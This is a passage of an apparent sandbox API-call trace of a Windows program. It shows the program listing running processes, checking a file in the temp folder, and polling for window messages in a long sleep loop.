th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0300.384] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0300.385] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0300.386] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0300.386] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0300.399] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0300.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0300.399] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0300.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0300.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0300.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0300.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0300.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0300.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0300.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0300.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0300.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0300.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0300.400] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0300.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0300.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0300.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0300.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0300.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0300.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0300.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0300.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0300.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0300.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0300.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0300.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0300.400] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0300.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0300.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0300.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0300.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0300.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0300.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa700 [0300.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0300.401] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0300.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0300.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0300.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0300.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0300.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0300.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0300.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0300.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0300.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0300.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0300.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0300.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0300.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0300.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0300.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0300.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0300.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0300.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0300.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0300.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0300.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0300.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0300.402] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0300.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0300.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0300.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0300.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0300.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0300.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0300.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0300.402] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0300.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0300.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0300.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0300.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0300.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0300.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0300.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0300.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0300.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0300.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0300.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0300.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0300.403] timeGetTime () returned 0x4b0e6 [0300.403] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.403] Sleep (dwMilliseconds=0xa) [0300.409] timeGetTime () returned 0x4b0f5 [0300.409] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.410] Sleep (dwMilliseconds=0xa) [0300.425] timeGetTime () returned 0x4b105 [0300.425] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.425] Sleep (dwMilliseconds=0xa) [0300.441] timeGetTime () returned 0x4b115 [0300.441] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.441] Sleep (dwMilliseconds=0xa) [0300.457] timeGetTime () returned 0x4b124 [0300.457] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.457] Sleep (dwMilliseconds=0xa) [0300.472] timeGetTime () returned 0x4b134 [0300.472] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.472] Sleep (dwMilliseconds=0xa) [0300.489] timeGetTime () returned 0x4b143 [0300.489] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.489] Sleep (dwMilliseconds=0xa) [0300.503] timeGetTime () returned 0x4b153 [0300.503] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.504] Sleep (dwMilliseconds=0xa) [0300.520] timeGetTime () returned 0x4b163 [0300.520] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.520] Sleep (dwMilliseconds=0xa) [0300.534] timeGetTime () returned 0x4b172 [0300.534] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.534] Sleep (dwMilliseconds=0xa) [0300.550] timeGetTime () returned 0x4b182 [0300.550] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.550] Sleep (dwMilliseconds=0xa) [0300.566] timeGetTime () returned 0x4b191 [0300.566] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0300.566] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0300.566] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0300.566] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0300.566] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0300.566] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.566] Sleep (dwMilliseconds=0xa) [0300.581] timeGetTime () returned 0x4b1a1 [0300.581] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.581] Sleep (dwMilliseconds=0xa) [0300.597] timeGetTime () returned 0x4b1b1 [0300.597] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.597] Sleep (dwMilliseconds=0xa) [0300.613] timeGetTime () returned 0x4b1c0 [0300.613] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.613] Sleep (dwMilliseconds=0xa) [0300.628] timeGetTime () returned 0x4b1d0 [0300.628] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.628] Sleep (dwMilliseconds=0xa) [0300.644] timeGetTime () returned 0x4b1df [0300.644] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.644] Sleep (dwMilliseconds=0xa) [0300.659] timeGetTime () returned 0x4b1ef [0300.659] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.659] Sleep (dwMilliseconds=0xa) [0300.675] timeGetTime () returned 0x4b1ff [0300.675] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.675] Sleep (dwMilliseconds=0xa) [0300.691] timeGetTime () returned 0x4b20e [0300.691] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.691] Sleep (dwMilliseconds=0xa) [0300.706] timeGetTime () returned 0x4b21e [0300.706] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.706] Sleep (dwMilliseconds=0xa) [0300.725] timeGetTime () returned 0x4b22d [0300.725] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.725] Sleep (dwMilliseconds=0xa) [0300.737] timeGetTime () returned 0x4b23d [0300.737] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.737] Sleep (dwMilliseconds=0xa) [0300.753] timeGetTime () returned 0x4b24d [0300.753] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.753] Sleep (dwMilliseconds=0xa) [0300.768] timeGetTime () returned 0x4b25c [0300.768] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.768] Sleep (dwMilliseconds=0xa) [0300.784] timeGetTime () returned 0x4b26c [0300.784] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.784] Sleep (dwMilliseconds=0xa) [0300.800] timeGetTime () returned 0x4b27b [0300.800] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.800] Sleep (dwMilliseconds=0xa) [0300.815] timeGetTime () returned 0x4b28b [0300.815] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.815] Sleep (dwMilliseconds=0xa) [0300.831] timeGetTime () returned 0x4b29b [0300.831] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.831] Sleep (dwMilliseconds=0xa) [0300.850] timeGetTime () returned 0x4b2aa [0300.850] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.850] Sleep (dwMilliseconds=0xa) [0300.862] timeGetTime () returned 0x4b2ba [0300.862] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.862] Sleep (dwMilliseconds=0xa) [0300.878] timeGetTime () returned 0x4b2c9 [0300.878] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.878] Sleep (dwMilliseconds=0xa) [0300.893] timeGetTime () returned 0x4b2d9 [0300.893] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.893] Sleep (dwMilliseconds=0xa) [0300.909] timeGetTime () returned 0x4b2e9 [0300.909] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.909] Sleep (dwMilliseconds=0xa) [0300.924] timeGetTime () returned 0x4b2f8 [0300.924] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.924] Sleep (dwMilliseconds=0xa) [0300.940] timeGetTime () returned 0x4b308 [0300.940] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.940] Sleep (dwMilliseconds=0xa) [0300.959] timeGetTime () returned 0x4b317 [0300.959] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.959] Sleep (dwMilliseconds=0xa) [0300.971] timeGetTime () returned 0x4b327 [0300.971] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.971] Sleep (dwMilliseconds=0xa) [0300.987] timeGetTime () returned 0x4b337 [0300.987] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.987] Sleep (dwMilliseconds=0xa) [0301.002] timeGetTime () returned 0x4b346 [0301.002] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.003] Sleep (dwMilliseconds=0xa) [0301.018] timeGetTime () returned 0x4b356 [0301.018] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.018] Sleep (dwMilliseconds=0xa) [0301.033] timeGetTime () returned 0x4b365 [0301.034] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.034] Sleep (dwMilliseconds=0xa) [0301.049] timeGetTime () returned 0x4b375 [0301.049] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.049] Sleep (dwMilliseconds=0xa) [0301.067] timeGetTime () returned 0x4b385 [0301.067] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.067] Sleep (dwMilliseconds=0xa) [0301.080] timeGetTime () returned 0x4b394 [0301.080] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.080] Sleep (dwMilliseconds=0xa) [0301.096] timeGetTime () returned 0x4b3a4 [0301.096] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.096] Sleep (dwMilliseconds=0xa) [0301.112] timeGetTime () returned 0x4b3b3 [0301.112] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.112] Sleep (dwMilliseconds=0xa) [0301.128] timeGetTime () returned 0x4b3c3 [0301.128] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.128] Sleep (dwMilliseconds=0xa) [0301.143] timeGetTime () returned 0x4b3d3 [0301.143] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.143] Sleep (dwMilliseconds=0xa) [0301.158] timeGetTime () returned 0x4b3e2 [0301.158] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.158] Sleep (dwMilliseconds=0xa) [0301.174] timeGetTime () returned 0x4b3f2 [0301.174] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.174] Sleep (dwMilliseconds=0xa) [0301.190] timeGetTime () returned 0x4b401 [0301.190] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.190] Sleep (dwMilliseconds=0xa) [0301.205] timeGetTime () returned 0x4b411 [0301.205] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.206] Sleep (dwMilliseconds=0xa) [0301.222] timeGetTime () returned 0x4b421 [0301.222] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.222] Sleep (dwMilliseconds=0xa) [0301.237] timeGetTime () returned 0x4b430 [0301.237] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.237] Sleep (dwMilliseconds=0xa) [0301.252] timeGetTime () returned 0x4b440 [0301.252] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.252] Sleep (dwMilliseconds=0xa) [0301.268] timeGetTime () returned 0x4b44f [0301.268] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.268] Sleep (dwMilliseconds=0xa) [0301.283] timeGetTime () returned 0x4b45f [0301.283] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0301.283] Sleep (dwMilliseconds=0xa) [0301.299] timeGetTime () returned 0x4b46f [0301.299] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 